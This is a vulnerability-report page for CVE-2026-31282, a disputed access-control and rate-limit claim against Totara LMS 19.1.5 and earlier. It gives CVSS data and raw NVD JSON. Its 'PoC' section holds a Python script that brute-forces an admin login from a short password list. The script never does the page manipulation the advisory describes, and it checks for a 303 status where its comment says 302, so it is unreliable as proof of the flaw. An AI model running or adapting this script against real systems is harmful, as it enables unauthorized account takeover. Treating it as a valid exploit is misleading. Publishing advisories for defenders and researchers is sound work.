Security Vulnerability Report
中文
CVE-2026-31282 CVSS 9.8 CRITICAL

CVE-2026-31282

Published: 2026-04-13 15:17:33
Last Modified: 2026-05-06 07:16:01
Source: [email protected]

Description

Totara LMS v19.1.5 and before is vulnerable to Incorrect Access Control. The login page code can be manipulated to reveal the login form. An attacker can chain that with missing rate-limit on the login form to launch a brute force attack. NOTE: this is disputed by the Supplier because (1) local login is enabled/disabled server side (this is not a client side control); (2) there is no evidence SSO login can be bypassed to allow local login; and (3) there is no evidence that local login can be performed when disabled server side.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Totara LMS <= 19.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Totara LMS instance target_url = "http://target-totara-lms/login/index.php" username = "admin" wordlist = ["password123", "admin123", "123456", "totora"] # Headers to mimic a legitimate browser request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Starting brute force attack on {target_url} for user: {username}") for password in wordlist: # Payload data to manipulate the login form submission payload = { "username": username, "password": password } try: # Send POST request to the login endpoint response = requests.post(target_url, data=payload, headers=headers, allow_redirects=False) # Check for successful login indicators (e.g., 302 Redirect to dashboard or specific cookies) if response.status_code == 303 or "MoodleSession" in response.cookies: print(f"[+] SUCCESS! Password found: {password}") break else: print(f"[-] Failed attempt: {password}") except requests.RequestException as e: print(f"[!] Error occurred: {e}") print("[*] Attack completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31282", "sourceIdentifier": "[email protected]", "published": "2026-04-13T15:17:33.100", "lastModified": "2026-05-06T07:16:00.677", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Totara LMS v19.1.5 and before is vulnerable to Incorrect Access Control. The login page code can be manipulated to reveal the login form. An attacker can chain that with missing rate-limit on the login form to launch a brute force attack. NOTE: this is disputed by the Supplier because (1) local login is enabled/disabled server side (this is not a client side control); (2) there is no evidence SSO login can be bypassed to allow local login; and (3) there is no evidence that local login can be performed when disabled server side."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/saykino/CVE-2026-31282", "source": "[email protected]"}, {"url": "https://www.totara.com/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.